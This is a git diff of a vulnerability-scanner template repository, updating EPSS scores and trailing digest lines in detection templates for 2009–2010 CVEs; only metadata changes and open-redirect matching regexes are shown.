regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502205817a149e40c9cc0c660f0e162d002c6e657759ee47bd91ab8278011c756b09f022100994fb61938e856999b11a45955436b1dab0a852f6f791b5b756d88883b883d02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205817a149e40c9cc0c660f0e162d002c6e657759ee47bd91ab8278011c756b09f022100994fb61938e856999b11a45955436b1dab0a852f6f791b5b756d88883b883d02:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index e4dd284ac3..b09a18301b 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2009-0347 cwe-id: CWE-59 epss-score: 0.10982 - epss-percentile: 0.94506 + epss-percentile: 0.94511 cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100f0ae4732d3b461a96aee40cf09a6c91844aa61629fe6cf4d3baf0599a4b43ef1022026efb79ae73aafe70c01a99514db235a4e580e4812e1caa33b6711dfb5341eca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f0ae4732d3b461a96aee40cf09a6c91844aa61629fe6cf4d3baf0599a4b43ef1022026efb79ae73aafe70c01a99514db235a4e580e4812e1caa33b6711dfb5341eca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 382db1a957..b341ca9d4a 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2009-0545 cwe-id: CWE-20 - epss-score: 0.97252 - epss-percentile: 0.99786 + epss-score: 0.9717 + epss-percentile: 0.9974 cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 018b855126..f7ca2689cd 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-0932 cwe-id: CWE-22 epss-score: 0.04048 - epss-percentile: 0.91099 + epss-percentile: 0.91106 cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fe67719d8882634bc5af2be7e3be0d98c87a14979460e8af5dd7e52f0ac63920022007fd746ce77044bee4f624cdd0d2e869faccf792626974d9efda0dcf324dfae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fe67719d8882634bc5af2be7e3be0d98c87a14979460e8af5dd7e52f0ac63920022007fd746ce77044bee4f624cdd0d2e869faccf792626974d9efda0dcf324dfae5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 9825daa0ae..4bd10e1aba 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-1151 cwe-id: CWE-94 epss-score: 0.79256 - epss-percentile: 0.97931 + epss-percentile: 0.97936 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c41e48d7150d0fe6afda7b3b019589e32445437a21e9f32dfc2fd79d564267c6022100bc5dd7c0f1f2da6def7c587fb635b07a5a810dd1ca94b000ed72e354d2bcb77c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c41e48d7150d0fe6afda7b3b019589e32445437a21e9f32dfc2fd79d564267c6022100bc5dd7c0f1f2da6def7c587fb635b07a5a810dd1ca94b000ed72e354d2bcb77c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 8df86f598e..bfc8833cd2 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-1496 cwe-id: CWE-22 epss-score: 0.00648 - epss-percentile: 0.77067 + epss-percentile: 0.7708 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100de5f3ba0f0b9a7fb6d0c4e6eaee87074357dfc34ca4eab5681b01db31776f014022100b293db3a0aeeffe417a987866ef3747ad4ece769c3cab1d0dd523a4279495ba3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100de5f3ba0f0b9a7fb6d0c4e6eaee87074357dfc34ca4eab5681b01db31776f014022100b293db3a0aeeffe417a987866ef3747ad4ece769c3cab1d0dd523a4279495ba3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 71e8217dee..e7f8387301 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-1558 cwe-id: CWE-22 epss-score: 0.00883 - epss-percentile: 0.80747 + epss-percentile: 0.80759 cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022023e841a87440ee2ee0356943e94d865f220a21e092d220157665dc1f1ffd601a022100be694d13e35a6e106d9580c33b49a75ea14e65ea623119d9cf23b9624810fa70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022023e841a87440ee2ee0356943e94d865f220a21e092d220157665dc1f1ffd601a022100be694d13e35a6e106d9580c33b49a75ea14e65ea623119d9cf23b9624810fa70:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index d7ac14ed18..d4e35c6be9 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-1872 cwe-id: CWE-79 epss-score: 0.40155 - epss-percentile: 0.96858 + epss-percentile: 0.96861 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f1072b2adcc77a536f9a98869f51183d2615f943cea206d0bfa6545e5d407316022042a4ce88bac1c9baa088563819e3f4dafeb97cbe31f385c0a570a3a3edc911ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f1072b2adcc77a536f9a98869f51183d2615f943cea206d0bfa6545e5d407316022042a4ce88bac1c9baa088563819e3f4dafeb97cbe31f385c0a570a3a3edc911ee:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 467b64663f..e1e5054f66 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-2015 cwe-id: CWE-22 epss-score: 0.00797 - epss-percentile: 0.79711 + epss-percentile: 0.79721 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bff99809efc917902f6837c5ce55d324c25d45d08cf9d6604e9abaa4867da041022100fd7ea40b5025d0dd2218d8deae5dd83bbc8be2e3321749a9a7d486e543fc8c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bff99809efc917902f6837c5ce55d324c25d45d08cf9d6604e9abaa4867da041022100fd7ea40b5025d0dd2218d8deae5dd83bbc8be2e3321749a9a7d486e543fc8c69:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index ef753b7237..2e42bed75d 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2009-2100 cwe-id: CWE-22 epss-score: 0.00528 - epss-percentile: 0.7444 + epss-percentile: 0.74456 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204084caf300047c1fc6f678047038162fa8420846e23cbca84112156ad80b4637022100aa6ef07475f3da84e0581c5d5a7a5f69582b383a6a39ac32d0bb4ab89fe3a298:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204084caf300047c1fc6f678047038162fa8420846e23cbca84112156ad80b4637022100aa6ef07475f3da84e0581c5d5a7a5f69582b383a6a39ac32d0bb4ab89fe3a298:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index d06ea93235..7d11deb504 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-3053 cwe-id: CWE-22 epss-score: 0.00367 - epss-percentile: 0.69485 + epss-percentile: 0.69501 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402206cac48fa50cf18b48e466b4694a95e285e0f8f0f72f9a4620e8376015253ef82022021fe6163c168e76a3a21f0943258e6e090d9eb6cf3aedc61f32f615fdfafbd72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206cac48fa50cf18b48e466b4694a95e285e0f8f0f72f9a4620e8376015253ef82022021fe6163c168e76a3a21f0943258e6e090d9eb6cf3aedc61f32f615fdfafbd72:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 7be7e7fa00..4dba1648fa 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-3318 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78226 + epss-percentile: 0.78239 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402206156c67a0d19473b15461d0b062d3683c211b1b2a1ae39d0b01ba214c0159e8a02203deb12aeef49bd5dd249d543fe9e4b03bcfe9d353fb1c81d868e8541f26ce1c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206156c67a0d19473b15461d0b062d3683c211b1b2a1ae39d0b01ba214c0159e8a02203deb12aeef49bd5dd249d543fe9e4b03bcfe9d353fb1c81d868e8541f26ce1c0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index 8c501ea9f4..59d4e20e73 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-4202 cwe-id: CWE-22 epss-score: 0.01956 - epss-percentile: 0.87415 + epss-percentile: 0.87431 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022038b401aac27ef1cff6a802b1a51edf850de5c97f3697ce0570da31810f8850a3022058124fe64684901f482816e488a62fcf783dd780730043c871ca40592eb9f46c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022038b401aac27ef1cff6a802b1a51edf850de5c97f3697ce0570da31810f8850a3022058124fe64684901f482816e488a62fcf783dd780730043c871ca40592eb9f46c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index f6bfc74a64..fc094d39be 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-4223 cwe-id: CWE-94 epss-score: 0.01041 - epss-percentile: 0.82334 + epss-percentile: 0.82352 cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022008b83eacddd2c4a8d234bb35ff95c90250c58cc90bd37d6bd0d1de6e96e1ab90022100f5fb44935ec9a8891d2b81ad9a8145217b039ed7d449204b7623127aad7b6f2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022008b83eacddd2c4a8d234bb35ff95c90250c58cc90bd37d6bd0d1de6e96e1ab90022100f5fb44935ec9a8891d2b81ad9a8145217b039ed7d449204b7623127aad7b6f2d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 66b9a19b07..3026ec351f 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-4679 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b47d3c8a565093581d253dddb46f5d91bc5f2ea1b933e90e10f023b71dd1c3f3022040127e823a2857f295beaab5d0d7d65d74a232318461cdfcfc1dccee1146fc69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b47d3c8a565093581d253dddb46f5d91bc5f2ea1b933e90e10f023b71dd1c3f3022040127e823a2857f295beaab5d0d7d65d74a232318461cdfcfc1dccee1146fc69:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 3408515efd..f0b09f8309 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2009-5020 cwe-id: CWE-20 epss-score: 0.00215 - epss-percentile: 0.59391 + epss-percentile: 0.59413 cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -35,4 +35,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a00463044022078b51ce01a5dedcec6afe231d09b3aab2e8a4332596128e0403b8d2572e852ac02203673b9a193329adaacc36aed01021660254cc0c389e3a71ee2e52d980295e6e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022078b51ce01a5dedcec6afe231d09b3aab2e8a4332596128e0403b8d2572e852ac02203673b9a193329adaacc36aed01021660254cc0c389e3a71ee2e52d980295e6e9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 865c842d62..f141107e55 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-5114 cwe-id: CWE-22 epss-score: 0.02357 - epss-percentile: 0.88616 + epss-percentile: 0.88624 cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205cb97a04cd0a6d21ac0ea44a2e7146eab292492df4a235c9808b4bfa9a04b31b022100dad7ed6153630fb4a356093c9d7ecff201d0df49602c7bfa35661e8203a58199:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205cb97a04cd0a6d21ac0ea44a2e7146eab292492df4a235c9808b4bfa9a04b31b022100dad7ed6153630fb4a356093c9d7ecff201d0df49602c7bfa35661e8203a58199:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index ab908ce4cd..82d5c090a2 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-0157 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022013b5de5f023730b90a55ce2c90cc2d48dcf9966f7ca4064fc87e9139c17427f2022051c4b3b831f79e2869e4ba64655a80fc2b0aa3f26dcdb70810615e43aab4bcf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022013b5de5f023730b90a55ce2c90cc2d48dcf9966f7ca4064fc87e9139c17427f2022051c4b3b831f79e2869e4ba64655a80fc2b0aa3f26dcdb70810615e43aab4bcf7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 662341d1c6..4d3ed1d8b7 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -59,4 +59,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008f4bad01c33bd0abc7a040d1f2873216d00a465439ba1eacafc0f9afc1e14379022035ff2091b7ca247d5df65db41584f094ab86acb4172116371ab0a3aae5c26947:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008f4bad01c33bd0abc7a040d1f2873216d00a465439ba1eacafc0f9afc1e14379022035ff2091b7ca247d5df65db41584f094ab86acb4172116371ab0a3aae5c26947:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index fc147ad51f..5e7c862629 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-0467 cwe-id: CWE-22 epss-score: 0.0586 - epss-percentile: 0.92587 + epss-percentile: 0.92591 cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022018073b3206c3b2c968e68ae7d2275e7079f4d94473f5813775679be51203a027022028bdc50fce758a1fe15e3198ea463b370b323bcb7ad5fef5c089dd54c4d3127b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022018073b3206c3b2c968e68ae7d2275e7079f4d94473f5813775679be51203a027022028bdc50fce758a1fe15e3198ea463b370b323bcb7ad5fef5c089dd54c4d3127b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 90fc80e436..7c5791788f 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0696 cwe-id: CWE-22 epss-score: 0.62698 - epss-percentile: 0.97467 + epss-percentile: 0.97469 cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cfabf3d51eb3fc27eab663bac0083491fe32b86660138ed70f87436b7b7b0f25022006ff13a9638ed46ee97260a2fa830c7c7733777a05135e0b0135f09e1a6eea4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100cfabf3d51eb3fc27eab663bac0083491fe32b86660138ed70f87436b7b7b0f25022006ff13a9638ed46ee97260a2fa830c7c7733777a05135e0b0135f09e1a6eea4d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 55b9d7d8ad..6b7dd1ed0b 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0759 cwe-id: CWE-22 epss-score: 0.01326 - epss-percentile: 0.84556 + epss-percentile: 0.84565 cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ca7b79abcc8f31a29ea46bfa597e3c420cced2b2d6bd336b058c1bcb8b8f12f202205957873e16254e096482c58cf52914456a6fab7a8c9b2880c2e78e88f5ad38cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ca7b79abcc8f31a29ea46bfa597e3c420cced2b2d6bd336b058c1bcb8b8f12f202205957873e16254e096482c58cf52914456a6fab7a8c9b2880c2e78e88f5ad38cf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index c467777256..c3605d6513 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0942 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73105 + epss-percentile: 0.7312 cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d028d10b311f7bb837d4a34740abd28ebaadbff8946ed559109dd738886ec94e022045b634f277a943e1af0f35b5ca72565afb5569bd5faf28268d1cb41932f1c540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d028d10b311f7bb837d4a34740abd28ebaadbff8946ed559109dd738886ec94e022045b634f277a943e1af0f35b5ca72565afb5569bd5faf28268d1cb41932f1c540:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index a33a89f558..045be20b37 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0943 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83297 + epss-percentile: 0.83314 cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100db213b00ee4d95fd9c580547fab71f008a21b9f9a04ac84b3151ca48c866d37102205d4e001df3dc7b9df183e21a9221ab08939285c05fb8605079c7d915c442547f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100db213b00ee4d95fd9c580547fab71f008a21b9f9a04ac84b3151ca48c866d37102205d4e001df3dc7b9df183e21a9221ab08939285c05fb8605079c7d915c442547f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 88dc4081f6..6f146e6e75 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-0944 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73105 + epss-percentile: 0.7312 cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008621302bfc5498ca7a0e195a8996031f15e2e82877e7daf31ad7d5fb51f20b300220305f9588e1d02343d4e9a14cb9f4748fa92503c6d670c9afc9a3ac54d0c354d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008621302bfc5498ca7a0e195a8996031f15e2e82877e7daf31ad7d5fb51f20b300220305f9588e1d02343d4e9a14cb9f4748fa92503c6d670c9afc9a3ac54d0c354d6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index f093a034fb..85d9874724 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0972 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79905 + epss-percentile: 0.79912 cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100acbc4cbe309b49cdc4ccf38e2100e675e674073cd1c1ebed35a6bf11a3bad9c40220746d728b6a0675abbc1708dab41e67c6c3ea3b035d536c7b9eec83785e2d5ddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100acbc4cbe309b49cdc4ccf38e2100e675e674073cd1c1ebed35a6bf11a3bad9c40220746d728b6a0675abbc1708dab41e67c6c3ea3b035d536c7b9eec83785e2d5ddd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index a3eee803e2..54a8e189da 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-0982 cwe-id: CWE-22 epss-score: 0.0087 - epss-percentile: 0.8057 + epss-percentile: 0.80583 cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a30ac58560d958ea75eff1d01d0e50dbe622c5aab1bc70cefca8880f9ab8aa9f02203b110252523925fcc4658814fba38ee213ff3b246bb31bae7fac601a0eae4bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a30ac58560d958ea75eff1d01d0e50dbe622c5aab1bc70cefca8880f9ab8aa9f02203b110252523925fcc4658814fba38ee213ff3b246bb31bae7fac601a0eae4bc3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 0440659fd4..e22d0c6066 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0985 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83822 + epss-percentile: 0.83832 cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402203b9605435a8afe7abbd0c043403ce4c178a713354a74b688e02676b879b75965022001a7bfae19e5b3ed1739ba8d33db791fcac2d55480938b3d5d61fe2a01ee09ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203b9605435a8afe7abbd0c043403ce4c178a713354a74b688e02676b879b75965022001a7bfae19e5b3ed1739ba8d33db791fcac2d55480938b3d5d61fe2a01ee09ff:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index f7d8aeeade..6271d03361 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1056 cwe-id: CWE-22 epss-score: 0.06484 - epss-percentile: 0.92949 + epss-percentile: 0.92952 cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022066d5d5c7849db99b6f47467d111d3a37930b08ef1f907f48c9449d1f8814602f022053bf34dd55442f4b0f358965762605b760cd12b922328b11c46cf83ed6ae3a70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 